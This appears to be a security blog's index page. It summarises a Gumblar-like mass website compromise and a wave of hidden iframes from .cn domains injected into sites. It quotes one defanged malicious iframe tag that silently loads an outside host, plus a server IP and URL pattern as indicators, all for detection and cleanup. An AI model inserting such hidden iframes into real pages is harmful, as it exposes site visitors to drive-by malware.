Selected short messages and links you might have missed if you don’t follow me on Twitter.
Selected short messages and links you might have missed if you don’t follow me on Twitter.
Safer PDF viewing, Gumblar zombies, Asprox, WayBack Machine and more… »»
Selected short messages and links you might have missed if you don’t follow me on Twitter.
mass WP hack on Network Solutions, virtualization, Google Webmaster Tools, etc … »»
Selected short messages and links you might have missed if you don’t follow me on Twitter.
Selected short messages and links you might have missed if you don’t follow me on Twitter.
Do you remember Gumblar? The massive hacker attack that managed to infect more than a hundred thousand legitimate web sites in a very short time this May? The infection was relatively easy to detect but very hard to completely get rid of. It infected various types of files and created backdoor scripts in inconspicuous places of websites so that hackers could easily restore the malicious content.
The gumblar .cn site (and its immediate successor martuz .cn) had been promptly shut down. As a result,the malicious script injected into hacked websites became harmless for site visitors. However, many webmasters failed to properly clean up their sites after the Gumblar infection, leaving the backdoor scripts intact. It was predicted that hackers would find the way to utilize this army of potentially controllable websites. Now, five months later, we see a new surge of a massive attack that resembles Gumblar in many aspects.
Continue »»
New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.
The html code looks like this
<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number.
Continue »»